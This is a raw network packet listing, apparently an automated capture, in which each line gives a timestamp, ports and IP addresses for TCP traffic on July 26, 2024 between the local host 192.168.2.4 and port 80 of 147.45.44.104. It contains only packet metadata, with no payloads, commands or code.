Jul 26, 2024 18:56:41.899924994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899951935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899960995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900235891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900248051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900258064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900294065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900314093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900372982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900382996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900418997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900433064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900444031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900453091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900461912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900471926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900474072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900496006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900510073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900895119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900906086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900916100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900927067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900935888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900939941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900947094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900958061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900964975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900969028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900979996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.900986910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.900995016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.901025057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.918781996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.918801069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.918812990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.918884993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.918888092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.918896914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.918909073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.918920994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.918922901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919390917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919403076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919413090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919416904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919425964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919437885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919437885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919450998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919461012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919461966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919475079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919480085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919488907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919512033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919533014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919909954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919922113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919933081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919944048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919955969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919956923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919966936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919975996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.919981003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919991970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.919991970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.920005083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.920016050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.920022964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.920027018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.920039892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.920043945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.920052052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.920063019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.920073986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.920073986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.920089960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.920108080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921005011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921019077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921027899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921039104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921050072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921060085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921061039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921072006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921082973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921092987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921097040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921108961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921119928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921127081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921132088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921142101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921143055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921156883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921163082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921170950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921178102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921202898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921858072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921870947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921880007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921890974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921900988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921906948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921914101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921926022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921927929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921937943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921945095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921951056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921962023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921962023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921974897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921987057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.921988964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.921998978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922019005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.922019958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922033072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922044992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.922074080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.922916889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922930956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922941923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922952890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922960997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.922965050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922976971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922987938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.922996998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.922998905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.923011065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.923021078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.923024893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.923032999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.923043966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.923043966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.923055887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.923058033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.923069000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.923089981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.923113108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.923671007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.925347090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.974176884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.974205017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.974216938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.974248886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.974261045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.974271059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.974284887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.974323034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.974376917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.988723993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988740921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988754034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988765001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988775969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988787889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988802910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988812923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988821983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.988826036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988838911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988851070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988861084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.988862991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988869905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.988877058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988888025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988889933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.988899946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988910913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.988913059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.988928080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.988955975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.989168882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989181042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989198923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989209890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989216089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.989223957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989231110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.989236116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989247084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989259958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.989262104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989269018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989279985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989283085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.989294052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.989315033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.989341021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.028211117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028230906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028243065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028274059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028285027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028295994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028315067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028316975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.028414965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.028414965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.028616905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028629065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028640032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028651953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028662920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028673887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028681993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.028686047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028697968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028709888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.028713942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.028734922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.028765917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.029611111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029623032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029633045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029644012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029654026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029666901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029676914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029678106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.029678106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.029687881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029699087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.029700994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029711962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029722929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029736042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.029742956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.029778957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.029778957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030356884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030368090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030379057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030390978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030400991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030411959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030421019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030422926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030421019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030435085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030447006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030456066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030457973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030469894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030481100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030487061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030493975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030505896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.030514002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030514002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030534029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.030561924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031079054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031090021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031100035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031111002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031121969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031132936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031135082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031135082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031142950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031155109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031166077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031176090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031177998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031188011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031199932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031199932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031209946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031219006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031223059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031234980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.031239986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031267881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.031294107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032052040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032064915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032075882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032082081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032092094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032103062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032111883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032124043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032124043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032135963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032146931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032150984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032157898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032171011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032179117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032181025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032179117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032192945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032202005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032206059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032227039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032249928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.032936096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032952070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.032984018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.033014059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.072024107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.072041988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.072053909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.072135925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.072145939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.072155952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.072165966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.072176933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.072259903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.087950945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088001966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088012934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088103056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088103056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.088114023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088125944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088136911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088164091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.088202000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.088367939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088380098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088396072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088406086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088417053 CEST	80	49757	147.45.44.104	192.168.2.4
